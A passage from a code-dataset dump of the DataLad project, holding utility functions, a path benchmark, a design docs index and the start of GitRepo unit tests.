compress_files\n dirname = file_basename(name)\n full_dirname = op.join(path, dirname)\n os.makedirs(full_dirname)\n create_tree(full_dirname, load, archives_leading_dir=archives_leading_dir)\n # create archive\n if archives_leading_dir:\n compress_files([dirname], name, path=path, overwrite=overwrite)\n else:\n compress_files(\n # <https://github.com/python/mypy/issues/9864>\n list(map(basename, glob.glob(op.join(full_dirname, '*')))), # type: ignore[arg-type]\n op.join(pardir, name),\n path=op.join(path, dirname),\n overwrite=overwrite)\n # remove original tree\n rmtree(full_dirname)\n\n\ndef create_tree(path: str, tree: TreeSpec, archives_leading_dir: bool =True, remove_existing: bool =False) -> None:\n \"\"\"Given a list of tuples (name, load) create such a tree\n\n if load is a tuple itself -- that would create either a subtree or an archive\n with that content and place it into the tree if name ends with .tar.gz\n \"\"\"\n lgr.log(5, \"Creating a tree under %s\", path)\n if not exists(path):\n os.makedirs(path)\n\n if isinstance(tree, dict):\n tree = list(tree.items())\n\n for file_, load in tree:\n if isinstance(file_, File):\n executable = file_.executable\n name = file_.name\n else:\n executable = False\n name = file_\n full_name = op.join(path, name)\n if remove_existing and lexists(full_name):\n rmtree(full_name, chmod_files=True)\n if isinstance(load, (tuple, list, dict)):\n if name.endswith('.tar.gz') or name.endswith('.tar') or name.endswith('.zip'):\n create_tree_archive(\n path, name, load,\n archives_leading_dir=archives_leading_dir)\n else:\n create_tree(\n full_name, load,\n archives_leading_dir=archives_leading_dir,\n remove_existing=remove_existing)\n else:\n if full_name.endswith('.gz'):\n def open_func() -> IO[bytes]:\n return gzip.open(full_name, \"wb\") # type: ignore[return-value]\n elif full_name.split('.')[-1] in ('xz', 'lzma'):\n import lzma\n def open_func() -> IO[bytes]:\n return lzma.open(full_name, \"wb\")\n else:\n def open_func() -> IO[bytes]:\n return open(full_name, \"wb\")\n with open_func() as f:\n f.write(ensure_bytes(load, 'utf-8'))\n if executable:\n os.chmod(full_name, os.stat(full_name).st_mode | stat.S_IEXEC)\n\n\ndef get_suggestions_msg(values: Optional[str | Iterable[str]], known: str, sep: str=\"\\n \") -> str:\n \"\"\"Return a formatted string with suggestions for values given the known ones\n \"\"\"\n import difflib\n suggestions = []\n if not values:\n values = []\n elif isinstance(values, str):\n values = [values]\n for value in values: # might not want to do it if we change presentation below\n suggestions += difflib.get_close_matches(value, known)\n suggestions = unique(suggestions)\n msg = \"Did you mean any of these?\"\n if suggestions:\n if '\\n' in sep:\n # if separator includes new line - we add entire separator right away\n msg += sep\n else:\n msg += ' '\n return msg + \"%s\\n\" % sep.join(suggestions)\n return ''\n\n\ndef bytes2human(n: int | float, format: str ='%(value).1f %(symbol)sB') -> str:\n \"\"\"\n Convert n bytes into a human readable string based on format.\n symbols can be either \"customary\", \"customary_ext\", \"iec\" or \"iec_ext\",\n see: http://goo.gl/kTQMs\n\n >>> from datalad.utils import bytes2human\n >>> bytes2human(1)\n '1.0 B'\n >>> bytes2human(1024)\n '1.0 KB'\n >>> bytes2human(1048576)\n '1.0 MB'\n >>> bytes2human(1099511627776127398123789121)\n '909.5 YB'\n\n >>> bytes2human(10000, \"%(value).1f %(symbol)s/sec\")\n '9.8 K/sec'\n\n >>> # precision can be adjusted by playing with %f operator\n >>> bytes2human(10000, format=\"%(value).5f %(symbol)s\")\n '9.76562 K'\n\n Taken from: http://goo.gl/kTQMs and subsequently simplified\n Original Author: Giampaolo Rodola' <g.rodola [AT] gmail [DOT] com>\n License: MIT\n \"\"\"\n n = int(n)\n if n < 0:\n raise ValueError(\"n < 0\")\n symbols = ('', 'K', 'M', 'G', 'T', 'P', 'E', 'Z', 'Y')\n prefix = {}\n for i, s in enumerate(symbols[1:]):\n prefix[s] = 1 << (i + 1) * 10\n for symbol in reversed(symbols[1:]):\n if n >= prefix[symbol]:\n value = float(n) / prefix[symbol]\n return format % locals()\n return format % dict(symbol=symbols[0], value=n)\n\n\ndef quote_cmdlinearg(arg: str) -> str:\n \"\"\"Perform platform-appropriate argument quoting\"\"\"\n # https://stackoverflow.com/a/15262019\n return '\"{}\"'.format(\n arg.replace('\"', '\"\"')\n ) if on_windows else shlex_quote(arg)\n\n\ndef guard_for_format(arg: str) -> str:\n \"\"\"Replace { and } with {{ and }}\n\n To be used in cases if arg is not expected to have provided\n by user .format() placeholders, but 'arg' might become a part\n of a composite passed to .format(), e.g. via 'Run'\n \"\"\"\n return arg.replace('{', '{{').replace('}', '}}')\n\n\ndef join_cmdline(args: Iterable[str]) -> str:\n \"\"\"Join command line args into a string using quote_cmdlinearg\n \"\"\"\n return ' '.join(map(quote_cmdlinearg, args))\n\n\ndef split_cmdline(s: str) -> list[str]:\n \"\"\"Perform platform-appropriate command line splitting.\n\n Identical to `shlex.split()` on non-windows platforms.\n\n Modified from https://stackoverflow.com/a/35900070\n \"\"\"\n if not on_windows:\n return shlex_split(s)\n\n # the rest is for windows\n RE_CMD_LEX = r'''\"((?:\"\"|\\\\[\"\\\\]|[^\"])*)\"?()|(\\\\\\\\(?=\\\\*\")|\\\\\")|(&&?|\\|\\|?|\\d?>|[<])|([^\\s\"&|<>]+)|(\\s+)|(.)'''\n\n args = []\n accu = None # collects pieces of one arg\n for qs, qss, esc, pipe, word, white, fail in re.findall(RE_CMD_LEX, s):\n if word:\n pass # most frequent\n elif esc:\n word = esc[1]\n elif white or pipe:\n if accu is not None:\n args.append(accu)\n if pipe:\n args.append(pipe)\n accu = None\n continue\n elif fail:\n raise ValueError(\"invalid or incomplete shell string\")\n elif qs:\n word = qs.replace('\\\\\"', '\"').replace('\\\\\\\\', '\\\\')\n if platform == 0:\n word = word.replace('\"\"', '\"')\n else:\n word = qss # may be even empty; must be last\n\n accu = (accu or '') + word\n\n if accu is not None:\n args.append(accu)\n\n return args\n\n\ndef get_wrapped_class(wrapped: Callable) -> type:\n \"\"\"Determine the command class a wrapped __call__ belongs to\"\"\"\n mod = sys.modules[wrapped.__module__]\n command_class_name = wrapped.__qualname__.split('.')[-2]\n _func_class = mod.__dict__[command_class_name]\n lgr.debug(\"Determined class of decorated function: %s\", _func_class)\n return _func_class\n\n\ndef _make_assure_kludge(fn: Callable[P, T]) -> Callable[P, T]:\n old_name = fn.__name__.replace(\"ensure\", \"assure\")\n\n @wraps(fn)\n def compat_fn(*args: P.args, **kwargs: P.kwargs) -> T:\n warnings.warn(\n \"{} is deprecated and will be removed in a future release. \"\n \"Use {} instead.\"\n .format(old_name, fn.__name__),\n DeprecationWarning)\n return fn(*args, **kwargs)\n\n compat_fn.__doc__ = (\"Note: This function is deprecated. Use {} instead.\"\n .format(fn.__name__))\n return compat_fn\n\n\nassure_tuple_or_list = _make_assure_kludge(ensure_tuple_or_list)\nassure_iter = _make_assure_kludge(ensure_iter)\nassure_list = _make_assure_kludge(ensure_list)\nassure_list_from_str = _make_assure_kludge(ensure_list_from_str)\nassure_dict_from_str = _make_assure_kludge(ensure_dict_from_str)\nassure_bytes = _make_assure_kludge(ensure_bytes)\nassure_unicode = _make_assure_kludge(ensure_unicode)\nassure_bool = _make_assure_kludge(ensure_bool)\nassure_dir = _make_assure_kludge(ensure_dir)\n\n\nlgr.log(5, \"Done importing datalad.utils\")\n\n\ndef check_symlink_capability(path: Path, target: Path) -> bool:\n \"\"\"helper similar to datalad.tests.utils_pytest.has_symlink_capability\n\n However, for use in a datalad command context, we shouldn't\n assume to be able to write to tmpfile and also not import a whole lot from\n datalad's test machinery. Finally, we want to know, whether we can create a\n symlink at a specific location, not just somewhere. Therefore use\n arbitrary path to test-build a symlink and delete afterwards. Suitable\n location can therefore be determined by high lever code.\n\n Parameters\n ----------\n path: Path\n target: Path\n\n Returns\n -------\n bool\n \"\"\"\n\n try:\n target.touch()\n path.symlink_to(target)\n return True\n except Exception:\n return False\n finally:\n if path.exists():\n path.unlink()\n if target.exists():\n target.unlink()\n\n\ndef obtain_write_permission(path: Path) -> Optional[int]:\n \"\"\"Obtains write permission for `path` and returns previous mode if a\n change was actually made.\n\n Parameters\n ----------\n path: Path\n path to try to obtain write permission for\n\n Returns\n -------\n int or None\n previous mode of `path` as return by stat().st_mode if a change in\n permission was actually necessary, `None` otherwise.\n \"\"\"\n\n mode = path.stat().st_mode\n # only IWRITE works on Windows, in principle\n if not mode & stat.S_IWRITE:\n path.chmod(mode | stat.S_IWRITE)\n return mode\n else:\n return None\n\n\n@contextmanager\ndef ensure_write_permission(path: Path) -> Iterator[None]:\n \"\"\"Context manager to get write permission on `path` and\n restore original mode afterwards.\n\n Parameters\n ----------\n path: Path\n path to the target file\n\n Raises\n ------\n PermissionError\n if write permission could not be obtained\n \"\"\"\n\n restore = None\n try:\n restore = obtain_write_permission(path)\n yield\n finally:\n if restore is not None:\n try:\n path.chmod(restore)\n except FileNotFoundError:\n # If `path` was deleted within the context block, there's\n # nothing to do. Don't test exists(), though - asking for\n # forgiveness to save a call.\n pass\n" }, { "alpha_fraction": 0.6390670537948608, "alphanum_fraction": 0.6425656080245972, "avg_line_length": 41.875, "blob_id": "97b33cdb46ba7abe78a8e177f85b4768a1db21e7", "content_id": "2471c2ae40ca8392ee57afa826f5941c427c07df", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1715, "license_type": "permissive", "max_line_length": 88, "num_lines": 40, "path": "/benchmarks/support/path.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# Import functions to be tested with _ suffix and name the suite after the\n# original function so we could easily benchmark it e.g. by\n# asv run --python=same -b get_parent_paths\n# without need to discover what benchmark to use etc\n\nfrom datalad.support.path import get_parent_paths as get_parent_paths_\n\nfrom ..common import SuprocBenchmarks\n\nclass get_parent_paths(SuprocBenchmarks):\n\n def setup(self):\n # prepare some more or less realistic with a good number of paths\n # and some hierarchy of submodules\n self.nfiles = 40 # per each construct\n self.nsubmod = 30 # at two levels\n self.toplevel_submods = ['submod%d' % i for i in range(self.nsubmod)]\n self.posixpaths = \\\n ['file%d' % i for i in range(self.nfiles)] + \\\n ['subdir/anotherfile%d' % i for i in range(self.nfiles)]\n for submod in range(self.nsubmod):\n self.posixpaths += \\\n ['submod%d/file%d' % (submod, i) for i in range(self.nfiles)] + \\\n ['subdir/submod%d/file%d' % (submod, i) for i in range(self.nfiles)] + \\\n ['submod/sub%d/file%d' % (submod, i) for i in range(self.nfiles)]\n\n def time_no_submods(self):\n assert get_parent_paths_(self.posixpaths, [], True) == []\n\n def time_one_submod_toplevel(self):\n get_parent_paths_(self.posixpaths, ['submod9'], True)\n\n def time_one_submod_subdir(self):\n get_parent_paths_(self.posixpaths, ['subdir/submod9'], True)\n\n def time_allsubmods_toplevel_only(self):\n get_parent_paths_(self.posixpaths, self.toplevel_submods, True)\n\n def time_allsubmods_toplevel(self):\n get_parent_paths_(self.posixpaths, self.toplevel_submods)\n" }, { "alpha_fraction": 0.6813880205154419, "alphanum_fraction": 0.6908517479896545, "avg_line_length": 16.135135650634766, "blob_id": "0aa329df9f4549e651189a05912a5eafa41fb120", "content_id": "7e8ee385cb74a1d44512f745f23f7fd0d7504977", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 634, "license_type": "permissive", "max_line_length": 73, "num_lines": 37, "path": "/docs/source/design/index.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": ".. -*- mode: rst -*-\n.. vi: set ft=rst sts=4 ts=4 sw=4 et tw=79:\n\n.. _chap_design:\n\n******\nDesign\n******\n\nThe chapter described command API principles and the design of particular\nsubsystems in DataLad.\n\n.. toctree::\n :maxdepth: 2\n\n cli\n provenance_capture\n application_vs_library_mode\n file_url_handling\n result_records\n dataset_argument\n log_levels\n drop\n python_imports\n miscpatterns\n exception_handling\n credentials\n url_substitution\n threaded_runner\n batched_command\n standard_parameters\n pos_vs_kw_parameters\n docstrings\n progress_reporting\n github_actions\n testing\n user_messaging\n" }, { "alpha_fraction": 0.6141617894172668, "alphanum_fraction": 0.6216881275177002, "avg_line_length": 33.44987487792969, "blob_id": "c1642bf5ca28589861edac6595d09805666cffb9", "content_id": "79227d08aabb61c8dcad64647cb3686384945538", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 55671, "license_type": "permissive", "max_line_length": 109, "num_lines": 1616, "path": "/datalad/support/tests/test_gitrepo.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test implementation of class GitRepo\n\n\"\"\"\n\nimport logging\nimport os\nimport os.path as op\nimport sys\n\nimport pytest\n\nfrom datalad import get_encoding_info\nfrom datalad.cmd import (\n StdOutCapture,\n StdOutErrCapture,\n WitlessRunner,\n)\nfrom datalad.support.exceptions import (\n CommandError,\n FileNotInRepositoryError,\n InvalidGitRepositoryError,\n NoSuchPathError,\n PathKnownToRepositoryError,\n)\nfrom datalad.support.external_versions import external_versions\nfrom datalad.support.gitrepo import (\n GitRepo,\n _normalize_path,\n normalize_paths,\n to_options,\n)\nfrom datalad.support.sshconnector import get_connection_hash\nfrom datalad.tests.utils_pytest import (\n DEFAULT_BRANCH,\n DEFAULT_REMOTE,\n SkipTest,\n assert_cwd_unchanged,\n assert_equal,\n assert_false,\n assert_in,\n assert_in_results,\n assert_is_instance,\n assert_not_equal,\n assert_not_in,\n assert_raises,\n assert_repo_status,\n assert_true,\n create_tree,\n eq_,\n get_most_obscure_supported_name,\n integration,\n neq_,\n ok_,\n skip_if_no_network,\n skip_if_on_windows,\n skip_nomultiplex_ssh,\n slow,\n swallow_logs,\n with_tempfile,\n with_tree,\n xfail_buggy_annex_info,\n)\nfrom datalad.utils import (\n Path,\n chpwd,\n getpwd,\n on_windows,\n rmtree,\n)\n\n\n@with_tempfile(mkdir=True)\ndef test_GitRepo_invalid_path(path=None):\n with chpwd(path):\n assert_raises(ValueError, GitRepo, path=\"git://some/url\", create=True)\n ok_(not op.exists(op.join(path, \"git:\")))\n assert_raises(ValueError, GitRepo, path=\"file://some_location/path/at/location\", create=True)\n ok_(not op.exists(op.join(path, \"file:\")))\n\n\n@assert_cwd_unchanged\n@with_tempfile\n@with_tempfile\ndef test_GitRepo_instance_from_clone(src=None, dst=None):\n origin = GitRepo(src, create=True)\n gr = GitRepo.clone(src, dst)\n assert_is_instance(gr, GitRepo, \"GitRepo was not created.\")\n ok_(op.exists(op.join(dst, '.git')))\n\n # do it again should raise ValueError since git will notice there's\n # already a git-repo at that path and therefore can't clone to `dst`\n # Note: Since GitRepo is now a WeakSingletonRepo, this is prevented from\n # happening atm. Disabling for now:\n# raise SkipTest(\"Disabled for RF: WeakSingletonRepo\")\n with swallow_logs() as logs:\n assert_raises(ValueError, GitRepo.clone, src, dst)\n\n\n@assert_cwd_unchanged\n@with_tempfile\ndef test_GitRepo_instance_from_existing(path=None):\n GitRepo(path, create=True)\n\n gr = GitRepo(path)\n assert_is_instance(gr, GitRepo, \"GitRepo was not created.\")\n ok_(op.exists(op.join(path, '.git')))\n\n\n@assert_cwd_unchanged\n@with_tempfile\n@with_tempfile\ndef test_GitRepo_instance_from_not_existing(path=None, path2=None):\n # 1. create=False and path doesn't exist:\n assert_raises(NoSuchPathError, GitRepo, path, create=False)\n assert_false(op.exists(path))\n\n # 2. create=False, path exists, but no git repo:\n os.mkdir(path)\n ok_(op.exists(path))\n assert_raises(InvalidGitRepositoryError, GitRepo, path, create=False)\n assert_false(op.exists(op.join(path, '.git')))\n\n # 3. create=True, path doesn't exist:\n gr = GitRepo(path2, create=True)\n assert_is_instance(gr, GitRepo, \"GitRepo was not created.\")\n ok_(op.exists(op.join(path2, '.git')))\n assert_repo_status(path2, annex=False)\n\n # 4. create=True, path exists, but no git repo:\n gr = GitRepo(path, create=True)\n assert_is_instance(gr, GitRepo, \"GitRepo was not created.\")\n ok_(op.exists(op.join(path, '.git')))\n assert_repo_status(path, annex=False)\n\n\n@with_tempfile\ndef test_GitRepo_init_options(path=None):\n # passing an option, not explicitly defined in GitRepo class:\n gr = GitRepo(path, create=True, bare=True)\n ok_(gr.config.getbool(section=\"core\", option=\"bare\"))\n\n\n@with_tempfile\n@with_tempfile(mkdir=True)\n@with_tree(tree={'somefile': 'content', 'config': 'not a git config'})\n@with_tree(tree={'afile': 'other',\n '.git': {}})\n@with_tempfile\n@with_tempfile\ndef test_GitRepo_bare(path=None, empty_dir=None, non_empty_dir=None, empty_dot_git=None, non_bare=None,\n clone_path=None):\n\n import gc\n\n # create a bare repo:\n gr = GitRepo(path, create=True, bare=True)\n assert_equal(gr.dot_git, gr.pathobj)\n assert_true(gr.bare)\n assert_true(gr.config.getbool(\"core\", \"bare\"))\n assert_false((gr.pathobj / '.git').exists())\n assert_false(gr.call_git_success(['status'], expect_stderr=True))\n\n # kill the object and try to get a new instance on an existing bare repo:\n del gr\n gc.collect()\n\n gr = GitRepo(path, create=False)\n assert_equal(gr.dot_git, gr.pathobj)\n assert_true(gr.bare)\n assert_true(gr.config.getbool(\"core\", \"bare\"))\n assert_false((gr.pathobj / '.git').exists())\n assert_false(gr.call_git_success(['status'], expect_stderr=True))\n\n # an empty dir is not a bare repo:\n assert_raises(InvalidGitRepositoryError, GitRepo, empty_dir,\n create=False)\n\n # an arbitrary dir is not a bare repo:\n assert_raises(InvalidGitRepositoryError, GitRepo, non_empty_dir,\n create=False)\n\n # nor is a path with an empty .git:\n assert_raises(InvalidGitRepositoryError, GitRepo, empty_dot_git,\n create=False)\n\n # a regular repo is not bare\n non_bare_repo = GitRepo(non_bare, create=True)\n assert_false(non_bare_repo.bare)\n\n # we can have a bare clone\n clone = GitRepo.clone(non_bare, clone_path, clone_options={'bare': True})\n assert_true(clone.bare)\n\n@with_tree(\n tree={\n 'subds': {\n 'file_name': ''\n }\n }\n)\ndef test_init_fail_under_known_subdir(path=None):\n repo = GitRepo(path, create=True)\n repo.add(op.join('subds', 'file_name'))\n # Should fail even if we do not commit but only add to index:\n with assert_raises(PathKnownToRepositoryError) as cme:\n GitRepo(op.join(path, 'subds'), create=True)\n assert_in(\"file_name\", str(cme.value)) # we provide a list of offenders\n # and after we commit - the same story\n repo.commit(\"added file\")\n with assert_raises(PathKnownToRepositoryError) as cme:\n GitRepo(op.join(path, 'subds'), create=True)\n\n # But it would succeed if we disable the checks\n GitRepo(op.join(path, 'subds'), create=True, create_sanity_checks=False)\n\n\n@with_tempfile\n@with_tempfile\ndef test_GitRepo_equals(path1=None, path2=None):\n\n repo1 = GitRepo(path1)\n repo2 = GitRepo(path1)\n ok_(repo1 == repo2)\n eq_(repo1, repo2)\n repo2 = GitRepo(path2)\n neq_(repo1, repo2)\n ok_(repo1 != repo2)\n\n\n@assert_cwd_unchanged\n@with_tempfile\n@with_tempfile\ndef test_GitRepo_add(src=None, path=None):\n\n gr = GitRepo(path)\n filename = get_most_obscure_supported_name()\n with open(op.join(path, filename), 'w') as f:\n f.write(\"File to add to git\")\n added = gr.add(filename)\n\n eq_(added, {'success': True, 'file': filename})\n assert_in(filename, gr.get_indexed_files(),\n \"%s not successfully added to %s\" % (filename, path))\n # uncommitted:\n ok_(gr.dirty)\n\n filename = \"another.txt\"\n with open(op.join(path, filename), 'w') as f:\n f.write(\"Another file to add to git\")\n\n # include committing:\n added2 = gr.add(filename)\n gr.commit(msg=\"Add two files.\")\n eq_(added2, {'success': True, 'file': filename})\n\n assert_in(filename, gr.get_indexed_files(),\n \"%s not successfully added to %s\" % (filename, path))\n assert_repo_status(path)\n\n\n@assert_cwd_unchanged\n@with_tree(tree={\n 'd': {'f1': 'content1',\n 'f2': 'content2'},\n 'file': 'content3',\n 'd2': {'f1': 'content1',\n 'f2': 'content2'},\n 'file2': 'content3'\n\n })\ndef test_GitRepo_remove(path=None):\n\n gr = GitRepo(path, create=True)\n gr.add('*')\n gr.commit(\"committing all the files\")\n\n eq_(gr.remove('file'), ['file'])\n eq_(set(gr.remove('d', r=True, f=True)), {'d/f1', 'd/f2'})\n\n eq_(set(gr.remove('*', r=True, f=True)), {'file2', 'd2/f1', 'd2/f2'})\n\n\n@assert_cwd_unchanged\n@with_tempfile\ndef test_GitRepo_commit(path=None):\n\n gr = GitRepo(path)\n filename = get_most_obscure_supported_name()\n with open(op.join(path, filename), 'w') as f:\n f.write(\"File to add to git\")\n\n gr.add(filename)\n gr.commit(\"Testing GitRepo.commit().\")\n assert_repo_status(gr)\n eq_(\"Testing GitRepo.commit().\",\n gr.format_commit(\"%B\").strip())\n\n with open(op.join(path, filename), 'w') as f:\n f.write(\"changed content\")\n\n gr.add(filename)\n gr.commit(\"commit with options\", options=to_options(dry_run=True))\n # wasn't actually committed:\n ok_(gr.dirty)\n\n # commit with empty message:\n gr.commit()\n assert_repo_status(gr)\n assert_equal(gr.format_commit(\"%B\").strip(), \"[DATALAD] Recorded changes\")\n\n # amend commit:\n assert_equal(len(list(gr.get_branch_commits_())), 2)\n last_sha = gr.get_hexsha()\n with open(op.join(path, filename), 'w') as f:\n f.write(\"changed again\")\n gr.add(filename)\n gr.commit(\"amend message\", options=to_options(amend=True))\n assert_repo_status(gr)\n assert_equal(gr.format_commit(\"%B\").strip(), \"amend message\")\n assert_not_equal(last_sha, gr.get_hexsha())\n assert_equal(len(list(gr.get_branch_commits_())), 2)\n # amend w/o message maintains previous one:\n gr.commit(options=to_options(amend=True))\n assert_repo_status(gr)\n assert_equal(len(list(gr.get_branch_commits_())), 2)\n assert_equal(gr.format_commit(\"%B\").strip(), \"amend message\")\n\n # nothing to commit doesn't raise by default:\n gr.commit()\n # but does with careless=False:\n assert_raises(CommandError, gr.commit, careless=False)\n\n # committing untracked file raises:\n with open(op.join(path, \"untracked\"), \"w\") as f:\n f.write(\"some\")\n assert_raises(FileNotInRepositoryError, gr.commit, files=\"untracked\")\n # not existing file as well:\n assert_raises(FileNotInRepositoryError, gr.commit, files=\"not-existing\")\n\n\n@with_tempfile\ndef test_GitRepo_get_indexed_files(path=None):\n\n gr = GitRepo(path)\n for filename in ('some1.txt', 'some2.dat'):\n with open(op.join(path, filename), 'w') as f:\n f.write(filename)\n gr.add(filename)\n gr.commit('Some files')\n\n idx_list = gr.get_indexed_files()\n\n runner = WitlessRunner(cwd=path)\n out = runner.run(['git', 'ls-files'], protocol=StdOutCapture)\n out_list = list(filter(bool, out['stdout'].split('\\n')))\n\n for item in idx_list:\n assert_in(item, out_list, \"%s not found in output of git ls-files in %s\" % (item, path))\n for item in out_list:\n assert_in(item, idx_list, \"%s not found in output of get_indexed_files in %s\" % (item, path))\n\n\n@with_tree([\n ('empty', ''),\n ('d1', (\n ('empty', ''),\n ('d2',\n (('empty', ''),\n )),\n )),\n ])\n@assert_cwd_unchanged(ok_to_chdir=True)\ndef test_normalize_path(git_path=None):\n\n gr = GitRepo(git_path)\n\n # cwd is currently outside the repo, so any relative path\n # should be interpreted as relative to `annex_path`\n assert_raises(FileNotInRepositoryError, _normalize_path, gr.path, getpwd())\n\n result = _normalize_path(gr.path, \"testfile\")\n eq_(result, \"testfile\", \"_normalize_path() returned %s\" % result)\n\n # result = _normalize_path(gr.path, op.join('.', 'testfile'))\n # eq_(result, \"testfile\", \"_normalize_path() returned %s\" % result)\n #\n # result = _normalize_path(gr.path, op.join('testdir', '..', 'testfile'))\n # eq_(result, \"testfile\", \"_normalize_path() returned %s\" % result)\n # Note: By now, normpath within normalize_paths() is disabled, therefore\n # disable these tests.\n\n result = _normalize_path(gr.path, op.join('testdir', 'testfile'))\n eq_(result, op.join(\"testdir\", \"testfile\"), \"_normalize_path() returned %s\" % result)\n\n result = _normalize_path(gr.path, op.join(git_path, \"testfile\"))\n eq_(result, \"testfile\", \"_normalize_path() returned %s\" % result)\n\n # now we are inside, so\n # OLD PHILOSOPHY: relative paths are relative to cwd and have\n # to be converted to be relative to annex_path\n # NEW PHILOSOPHY: still relative to repo! unless starts with . (curdir) or .. (pardir)\n with chpwd(op.join(git_path, 'd1', 'd2')):\n\n result = _normalize_path(gr.path, \"testfile\")\n eq_(result, 'testfile', \"_normalize_path() returned %s\" % result)\n\n # if not joined as directory name but just a prefix to the filename, should\n # behave correctly\n for d in (op.curdir, op.pardir):\n result = _normalize_path(gr.path, d + \"testfile\")\n eq_(result, d + 'testfile', \"_normalize_path() returned %s\" % result)\n\n result = _normalize_path(gr.path, op.join(op.curdir, \"testfile\"))\n eq_(result, op.join('d1', 'd2', 'testfile'), \"_normalize_path() returned %s\" % result)\n\n result = _normalize_path(gr.path, op.join(op.pardir, 'testfile'))\n eq_(result, op.join('d1', 'testfile'), \"_normalize_path() returned %s\" % result)\n\n assert_raises(FileNotInRepositoryError, _normalize_path, gr.path, op.join(git_path, '..', 'outside'))\n\n result = _normalize_path(gr.path, op.join(git_path, 'd1', 'testfile'))\n eq_(result, op.join('d1', 'testfile'), \"_normalize_path() returned %s\" % result)\n\n\ndef test_GitRepo_files_decorator():\n\n class testclass(object):\n def __init__(self):\n self.path = op.join('some', 'where')\n\n # TODO\n # yoh: logic is alien to me below why to have two since both look identical!\n @normalize_paths\n def decorated_many(self, files):\n return files\n\n @normalize_paths\n def decorated_one(self, file_):\n return file_\n\n test_instance = testclass()\n\n # When a single file passed -- single path returned\n obscure_filename = get_most_obscure_supported_name()\n file_to_test = op.join(test_instance.path, 'deep', obscure_filename)\n # file doesn't exist\n eq_(test_instance.decorated_one(file_to_test),\n _normalize_path(test_instance.path, file_to_test))\n eq_(test_instance.decorated_one(file_to_test),\n _normalize_path(test_instance.path, file_to_test))\n\n file_to_test = obscure_filename\n eq_(test_instance.decorated_many(file_to_test),\n _normalize_path(test_instance.path, file_to_test))\n eq_(test_instance.decorated_one(file_to_test),\n _normalize_path(test_instance.path, file_to_test))\n\n\n file_to_test = op.join(obscure_filename, 'beyond', 'obscure')\n eq_(test_instance.decorated_many(file_to_test),\n _normalize_path(test_instance.path, file_to_test))\n\n file_to_test = op.join(getpwd(), 'somewhere', 'else', obscure_filename)\n assert_raises(FileNotInRepositoryError, test_instance.decorated_many,\n file_to_test)\n\n # If a list passed -- list returned\n files_to_test = ['now', op.join('a list', 'of'), 'paths']\n expect = []\n for item in files_to_test:\n expect.append(_normalize_path(test_instance.path, item))\n eq_(test_instance.decorated_many(files_to_test), expect)\n\n eq_(test_instance.decorated_many(''), [])\n\n assert_raises(ValueError, test_instance.decorated_many, 1)\n assert_raises(ValueError, test_instance.decorated_one, 1)\n\n\n@skip_if_no_network\n@with_tempfile\ndef test_GitRepo_remote_add(path=None):\n gr = GitRepo(path)\n gr.add_remote('github', 'https://github.com/datalad/testrepo--basic--r1')\n out = gr.get_remotes()\n assert_in('github', out)\n eq_(len(out), 1)\n eq_('https://github.com/datalad/testrepo--basic--r1', gr.config['remote.github.url'])\n\n\n@with_tempfile\ndef test_GitRepo_remote_remove(path=None):\n\n gr = GitRepo(path)\n gr.add_remote('github', 'https://github.com/datalad/testrepo--basic--r1')\n out = gr.get_remotes()\n eq_(len(out), 1)\n gr.remove_remote('github')\n out = gr.get_remotes()\n eq_(len(out), 0)\n\n\n@with_tempfile\ndef test_GitRepo_get_remote_url(path=None):\n\n gr = GitRepo(path)\n gr.add_remote('github', 'https://github.com/datalad/testrepo--basic--r1')\n eq_(gr.get_remote_url('github'),\n 'https://github.com/datalad/testrepo--basic--r1')\n\n\n@with_tempfile\n@with_tempfile\ndef test_GitRepo_fetch(orig_path=None, clone_path=None):\n\n origin = GitRepo(orig_path)\n with open(op.join(orig_path, 'some.txt'), 'w') as f:\n f.write(\"New text file.\")\n origin.add('some.txt')\n origin.commit(\"new file added.\")\n\n clone = GitRepo.clone(orig_path, clone_path)\n filename = get_most_obscure_supported_name()\n\n origin.checkout(\"new_branch\", ['-b'])\n with open(op.join(orig_path, filename), 'w') as f:\n f.write(\"New file.\")\n origin.add(filename)\n origin.commit(\"new file added.\")\n\n fetched = clone.fetch(remote=DEFAULT_REMOTE)\n # test FetchInfo list returned by fetch\n eq_([DEFAULT_REMOTE + '/' + clone.get_active_branch(),\n DEFAULT_REMOTE + '/new_branch'],\n [commit['ref'] for commit in fetched])\n\n assert_repo_status(clone.path, annex=False)\n assert_in(DEFAULT_REMOTE + \"/new_branch\", clone.get_remote_branches())\n assert_in(filename, clone.get_files(DEFAULT_REMOTE + \"/new_branch\"))\n assert_false(op.exists(op.join(clone_path, filename))) # not checked out\n\n # create a remote without an URL:\n origin.add_remote('not-available', 'git://example.com/not/existing')\n origin.config.unset('remote.not-available.url', scope='local')\n\n # fetch without provided URL\n assert_raises(CommandError, origin.fetch, 'not-available')\n\n\ndef _path2localsshurl(path):\n \"\"\"Helper to build valid localhost SSH urls on Windows too\"\"\"\n path = op.abspath(path)\n p = Path(path)\n if p.drive:\n path = '/'.join(('/{}'.format(p.drive[0]),) + p.parts[1:])\n url = \"ssh://datalad-test{}\".format(path)\n return url\n\n\n@skip_nomultiplex_ssh\n@with_tempfile\n@with_tempfile\ndef test_GitRepo_ssh_fetch(remote_path=None, repo_path=None):\n from datalad import ssh_manager\n\n remote_repo = GitRepo(remote_path)\n with open(op.join(remote_path, 'some.txt'), 'w') as f:\n f.write(\"New text file.\")\n remote_repo.add('some.txt')\n remote_repo.commit(\"new file added.\")\n\n url = _path2localsshurl(remote_path)\n socket_path = op.join(str(ssh_manager.socket_dir),\n get_connection_hash('datalad-test'))\n repo = GitRepo(repo_path, create=True)\n repo.add_remote(\"ssh-remote\", url)\n\n # we don't know any branches of the 